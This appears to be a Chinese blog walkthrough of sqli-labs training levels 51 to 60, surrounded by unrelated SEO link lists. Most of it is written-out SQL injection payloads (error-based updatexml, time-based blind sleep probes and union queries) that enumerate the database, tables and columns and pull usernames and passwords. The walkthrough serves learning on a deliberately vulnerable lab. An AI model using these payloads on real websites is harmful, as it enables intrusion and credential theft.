当前位置: 首页 > news >正文

网站建设与推广合肥无锡百度正规推广

网站建设与推广合肥,无锡百度正规推广,手表拍卖网站,对外贸网站建设的建议sqli-labs-master靶场第五十一关 步骤一,尝试输入?sort1 我们发现这关可以报错注入 步骤二,爆库名 ?sort1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- 步骤三,爆表名 ?sort1 and updatexml(1,concat(0x7e,(select group_conc…

sqli-labs-master靶场第五十一关

步骤一,尝试输入?sort=1'

我们发现这关可以报错注入

步骤二,爆库名

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

步骤三,爆表名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

步骤四,爆users列名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

步骤五,爆users表中信息

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1) --+

sqli-labs-master靶场第五十二关

步骤一,这关的参数是sort,输入?sort=1--+

步骤二,查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

以此类推...最终得出数据库名为security

步骤三,查看表名

查security数据库中第一张表的第一位字符

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第五十三关

步骤一,这关的参数是sort,输入?sort=1'--+

步骤二,查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

以此类推...最终得出数据库名为security

步骤三,查看表名

查security数据库中第一张表的第一位字符

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第五十四关

步骤一,查看数据库

?id=-1'union select 1,2,database()--+

步骤二,查看表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三,查看users表中列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

sqli-labs-master靶场第五十五关

步骤一,查看数据库

?id=-1)union select 1,2,database()--+

步骤二,查看表名

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三,查看users表中列名

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

sqli-labs-master靶场第五十六关

步骤一,判断闭合方式

?id=1') --+

步骤二,查看数据库

?id=-1') union select 1,2,database()--+

步骤三,查看表名

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤四,查看users表中列名

?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

sqli-labs-master靶场第五十七关

步骤一,判断闭合方式

?id=1" --+

步骤二,查看数据库

?id=-1" union select 1,2,database()--+

步骤三,查看表名

?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤四,查看users表中列名

?id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

sqli-labs-master靶场第五十八关

步骤一,判断闭合方式

?id=1'

跟个单引号引起报错 说明页面有报错语句的位置

步骤二,查看数据库

?id=1' and updatexml(1,concat(1,(select database())),1)--+

步骤三,查看表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤四,查看users表中列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

sqli-labs-master靶场第五十九关

步骤一,判断闭合方式

?id=1 --+

步骤二,查看数据库

?id=-1 and updatexml(1,concat(1,(select database())),1) --+

步骤三,查看表名

?id=-1 and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+

步骤四,查看users表中列名

?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

sqli-labs-master靶场第六十关

步骤一,判断闭合方式

?id=1") --+

步骤二,查看数据库

?id=-1") and updatexml(1,concat(1,(select database())),1) --+

步骤三,查看表名

?id=-1") and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+

步骤四,查看users表中列名

?id=1") and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

http://www.yidumall.com/news/4756.html

相关文章:

  • 做贸易怎么找客户网站内部链接优化方法
  • 深圳 旅游 网站建设百度开发者平台
  • 餐厅网站建设方案常用的搜索引擎有哪些?
  • 湘潭做网站价格 磐石网络企业网站seo排名优化
  • 全屏网站模板中国新冠疫情最新消息
  • 手机网站如何做才能兼容性各种手机国家高新技术企业查询
  • 返回链接 网站惩罚检查 错误检查张家界百度seo
  • 旅游网站开发目的和意义武汉网络seo公司
  • 西安做网站公司8在线crm网站建站
  • 想给大学做网站游戏优化大师官方下载
  • 定制网站平台的安全设计google 浏览器
  • 浙江网站制作江苏网站开发
  • wordpress禁用日期整站优化包年
  • 如何在服务器上放网站口碑营销的模式
  • 汽车app网站建设800元做小程序网站
  • 主页不是wordpress标题优化seo
  • 贵阳建网站湖人最新消息
  • 什么网站好建设深圳seo优化服务
  • 我的世界做图片的网站百度首页精简版
  • 有哪些网站可以做java题目网络广告营销方案
  • 东莞网站设计开发网站上不去首页seo要怎么办
  • 社区教育网站建设项目计划书百度推广按效果付费是多少钱
  • 融水县住房和城乡建设局网站太原网站建设方案优化
  • 福安 网站建设武汉推广服务
  • 2013年政府网站建设seo文案范例
  • 太原网站公司网站快速排名公司
  • wordpress页面模版长春关键词优化排名
  • 设计方案审查意见北京seo助理
  • 粉丝帮女流做的网站网络营销介绍
  • 卧龙区网站建设东莞网站建设平台